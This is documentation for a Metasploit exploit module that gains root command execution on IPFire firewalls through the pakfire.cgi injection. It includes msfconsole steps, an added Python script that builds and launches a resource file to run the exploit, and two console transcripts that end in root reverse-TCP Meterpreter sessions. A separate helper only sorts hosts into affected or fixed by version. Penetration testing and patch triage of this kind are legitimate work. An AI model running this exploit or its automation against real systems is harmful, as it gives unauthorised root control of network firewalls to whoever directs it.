metasploit-gs/documentation/modules/exploit/linux/http/ipfire_pakfire_exec.md
Last modified: 2021-06-10 09:35:10 -05:00
## Vulnerable Application

Tested against:

  - IPFire 2.25 (Core Update 156)
  - IPFire 2.21 (Core Update 126)

This module exploits an authenticated command injection vulnerability in the `/cgi-bin/pakfire.cgi` page of the IPFire web interface, affecting IPFire 2.25 Core Update 156 and prior, to execute arbitrary code as the root user. Valid credentials for an administrative user of the web interface are required. The module's automatic check fingerprints the running IPFire release before exploitation, and, as the module output in the Scenarios section shows, it backs up `backup.pl`, replaces it with the payload, runs `/usr/local/bin/backupctrl` so that the payload executes as root, and restores the original `backup.pl` once the session is open.
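The affected range above is "IPFire 2.25 Core Update 156 and prior". The following triage helper is an added example (not part of the Metasploit module or of IPFire): it parses the release strings in the form the module's check prints (`IPFire 2.25 (Core Update 156)`) and classifies each host as affected, fixed or unknown. It assumes that IPFire 2.x Core Update numbers increase monotonically across releases, so the Core Update number alone orders them; the host list it runs over is constructed for the example.

```python
"""Triage helper for the IPFire pakfire.cgi command injection.

Added example, not code from the Metasploit module or the IPFire project.
Assumption: IPFire 2.x Core Update numbers increase monotonically across
releases (2.21 CU126 < 2.25 CU156 < CU157), so the Core Update number
alone decides whether a release is inside the affected range.
"""
import re
from typing import Dict, Iterable, NamedTuple, Optional

# Upper bound of the affected range stated in the module description.
LAST_AFFECTED_CORE_UPDATE = 156

# Matches the banner format the module's check prints, e.g.
# "Target is running IPFire 2.25 (Core Update 156)".
RELEASE_RE = re.compile(r"IPFire\s+(\d+)\.(\d+)\s*\(Core Update\s+(\d+)\)")


class Release(NamedTuple):
    major: int
    minor: int
    core_update: int


def parse_release(text: str) -> Optional[Release]:
    """Extract (major, minor, core_update) from text carrying an IPFire banner."""
    m = RELEASE_RE.search(text)
    if m is None:
        return None
    return Release(*(int(g) for g in m.groups()))


def is_affected(text: str) -> Optional[bool]:
    """True if affected, False if fixed, None if the release is unknown.

    None is returned rather than False so that an unparseable banner is
    never silently triaged as safe.
    """
    rel = parse_release(text)
    if rel is None or rel.major != 2:
        return None  # only the 2.x line is covered by the range above
    return rel.core_update <= LAST_AFFECTED_CORE_UPDATE


def triage(lines: Iterable[str]) -> Dict[str, str]:
    """Map 'host<TAB>banner' lines to 'affected', 'fixed' or 'unknown'."""
    result: Dict[str, str] = {}
    for line in lines:
        host, _, banner = line.partition("\t")
        verdict = is_affected(banner)
        if verdict is True:
            result[host.strip()] = "affected"
        elif verdict is False:
            result[host.strip()] = "fixed"
        else:
            result[host.strip()] = "unknown"
    return result


# Constructed sample input, hosts and banners made up for this example.
SAMPLE = [
    "172.22.244.50\tTarget is running IPFire 2.21 (Core Update 126)",
    "172.22.244.18\tTarget is running IPFire 2.25 (Core Update 156)",
    "10.0.0.9\tTarget is running IPFire 2.25 (Core Update 157)",
    "10.0.0.10\tno IPFire banner in this response",
]

if __name__ == "__main__":
    for host, verdict in triage(SAMPLE).items():
        print(f"{host:16} {verdict}")
```

Feed it the check output of a scan over your own firewalls (one `host<TAB>banner` line per host); anything that comes back `unknown` needs a manual look rather than being written off as patched.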

## Verification Steps

  1. Start `msfconsole`
  2. Do: `use exploit/linux/http/ipfire_pakfire_exec`
  3. Do: `set USERNAME <username of the administrative web-interface user to authenticate as>`
  4. Do: `set PASSWORD <password of that user>`
  5. Do: `set RHOSTS <target IP>`
  6. Do: `exploit`
  7. You should get a Meterpreter session running as the root user.
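The steps above can be replayed unattended from a Metasploit resource script. The generator below is an added example (not part of the module or of Metasploit): it writes the console commands from the steps into an `.rc` file and returns the `msfconsole -q -r <file>` command line that runs them. It assumes `msfconsole` is on `PATH` and that the option names match the module's `show options` output (`RHOSTS`, `USERNAME`, `PASSWORD`, plus the payload's `LHOST`/`LPORT`). Because resource scripts are parsed by the console's own tokenizer and may embed Ruby, a newline or quote in a credential would become additional console commands, so the generator rejects such values instead of trying to quote them.

```python
"""Generate a Metasploit resource script for the verification steps above.

Added example, not code from the Metasploit module or framework.
Assumptions: msfconsole is on PATH; option names are those shown by the
module's `show options` output (RHOSTS, USERNAME, PASSWORD) plus the
payload's LHOST/LPORT.
"""
import re
import shutil
import subprocess
from pathlib import Path
from typing import List, Union

MODULE = "exploit/linux/http/ipfire_pakfire_exec"

# Resource scripts are tokenised by msfconsole and may embed Ruby, so a
# stray newline or quote in a value could inject extra console commands.
# Only a conservative character set is accepted; anything else is refused.
SAFE_VALUE = re.compile(r"[A-Za-z0-9._:@/%+=,-]+")


def _checked(name: str, value: str) -> str:
    """Return value if it is safe to place on a `set` line, else raise."""
    if not SAFE_VALUE.fullmatch(value):
        raise ValueError(f"{name} contains characters unsafe for an .rc file")
    return value


def build_resource_script(rhosts: str, username: str, password: str,
                          lhost: str, lport: int = 4444,
                          run: bool = True) -> str:
    """Return the .rc text; with run=False it stops after the module's check."""
    lines: List[str] = [
        f"use {MODULE}",
        f"set RHOSTS {_checked('RHOSTS', rhosts)}",
        f"set USERNAME {_checked('USERNAME', username)}",
        f"set PASSWORD {_checked('PASSWORD', password)}",
        f"set LHOST {_checked('LHOST', lhost)}",
        f"set LPORT {int(lport)}",
        "check",
    ]
    if run:
        # -z: do not interact with the session, leave it in the background
        lines.append("exploit -z")
    return "\n".join(lines) + "\n"


def write_resource_script(path: Path, **kwargs) -> Path:
    """Write the script with owner-only permissions; it holds the admin password."""
    path.write_text(build_resource_script(**kwargs))
    path.chmod(0o600)
    return path


def msfconsole_argv(rc_path: Union[Path, str]) -> List[str]:
    """Command line that replays the script quietly (-q) from a file (-r)."""
    return ["msfconsole", "-q", "-r", str(rc_path)]


if __name__ == "__main__":
    # Addresses are those from the Scenarios section; adjust to your lab.
    rc = write_resource_script(Path("ipfire_pakfire.rc"),
                               rhosts="172.22.244.50", username="admin",
                               password="admin", lhost="172.22.244.16",
                               lport=9925)
    argv = msfconsole_argv(rc)
    if shutil.which("msfconsole"):
        subprocess.run(argv, check=False)
    else:
        print("msfconsole not found; would run:", " ".join(argv))
```

Run with `run=False` first to get only the module's version check across a host list; switch to `run=True` once you have confirmed the target and have authorisation to open a root session on it.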

## Options

**USERNAME**

Username of the administrative web-interface user to authenticate as. Defaults to `admin`.

**PASSWORD**

Password of that user.

## Scenarios

### IPFire 2.21 (Core Update 126)

```
msf6 > use exploit/linux/http/ipfire_pakfire_exec
[*] No payload configured, defaulting to python/meterpreter/reverse_tcp
msf6 exploit(linux/http/ipfire_pakfire_exec) > show options

Module options (exploit/linux/http/ipfire_pakfire_exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   yes       Password to login with
   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT     444              yes       The target port (TCP)
   SSL       false            no        Negotiate SSL/TLS for outgoing connections
   USERNAME  admin            yes       User to login with
   VHOST                      no        HTTP server virtual host


Payload options (python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.22.244.16    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target


msf6 exploit(linux/http/ipfire_pakfire_exec) > set RHOSTS 172.22.244.50
RHOSTS => 172.22.244.50
msf6 exploit(linux/http/ipfire_pakfire_exec) > set USERNAME admin
USERNAME => admin
msf6 exploit(linux/http/ipfire_pakfire_exec) > set PASSWORD admin
PASSWORD => admin
msf6 exploit(linux/http/ipfire_pakfire_exec) > set LPORT 9925
LPORT => 9925
msf6 exploit(linux/http/ipfire_pakfire_exec) > exploit

[*] Started reverse TCP handler on 172.22.244.16:9925
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. Target is running IPFire 2.21 (Core Update 126)
[*] Copying backup.pl to a backup file...
[*] Overwriting the contents of backup.pl with a Python header statement
[*] Appending the contents of backup.pl with code to setuid(0)
[*] Appending the contents of backup.pl with the Python code to be executed.
[*] Executing /usr/local/bin/backupctrl to execute the payload
[*] Sending stage (39392 bytes) to 172.22.244.50
[*] Meterpreter session 1 opened (172.22.244.16:9925 -> 172.22.244.50:41860) at 2021-06-04 16:48:12 -0500
[*] You should now have your shell, restoring the original contents of the backup.pl file...
[*] All done, enjoy the shells!

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : ipfire.localdomain
OS           : Linux 4.14.86-ipfire #1 SMP Tue Dec 11 08:36:08 GMT 2018
Architecture : x64
Meterpreter  : python/linux
meterpreter >
```

### IPFire 2.25 (Core Update 156)

```
msf6 > use exploit/linux/http/ipfire_pakfire_exec
[*] No payload configured, defaulting to python/meterpreter/reverse_tcp
msf6 exploit(linux/http/ipfire_pakfire_exec) > show options

Module options (exploit/linux/http/ipfire_pakfire_exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   yes       Password to login with
   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT     444              yes       The target port (TCP)
   SSL       false            no        Negotiate SSL/TLS for outgoing connections
   USERNAME  admin            yes       User to login with
   VHOST                      no        HTTP server virtual host


Payload options (python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.22.244.16    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target


msf6 exploit(linux/http/ipfire_pakfire_exec) > set RHOSTS 172.22.244.18
RHOSTS => 172.22.244.18
msf6 exploit(linux/http/ipfire_pakfire_exec) > set USERNAME admin
USERNAME => admin
msf6 exploit(linux/http/ipfire_pakfire_exec) > set PASSWORD admin
PASSWORD => admin
msf6 exploit(linux/http/ipfire_pakfire_exec) > exploit

[*] Started reverse TCP handler on 172.22.244.16:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. Target is running IPFire 2.25 (Core Update 156)
[*] Copying backup.pl to a backup file...
[*] Overwriting the contents of backup.pl with a Python header statement
[*] Appending the contents of backup.pl with code to setuid(0)
[*] Appending the contents of backup.pl with the Python code to be executed.
[*] Executing /usr/local/bin/backupctrl to execute the payload
[*] Sending stage (39392 bytes) to 172.22.244.18
[*] Meterpreter session 1 opened (172.22.244.16:4444 -> 172.22.244.18:33936) at 2021-06-04 16:07:39 -0500
[*] You should now have your shell, restoring the original contents of the backup.pl file...
[*] All done, enjoy the shells!

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : ipfire.localdomain
OS           : Linux 4.14.212-ipfire #1 SMP Tue May 4 09:02:54 GMT 2021
Architecture : x64
Meterpreter  : python/linux
meterpreter >
```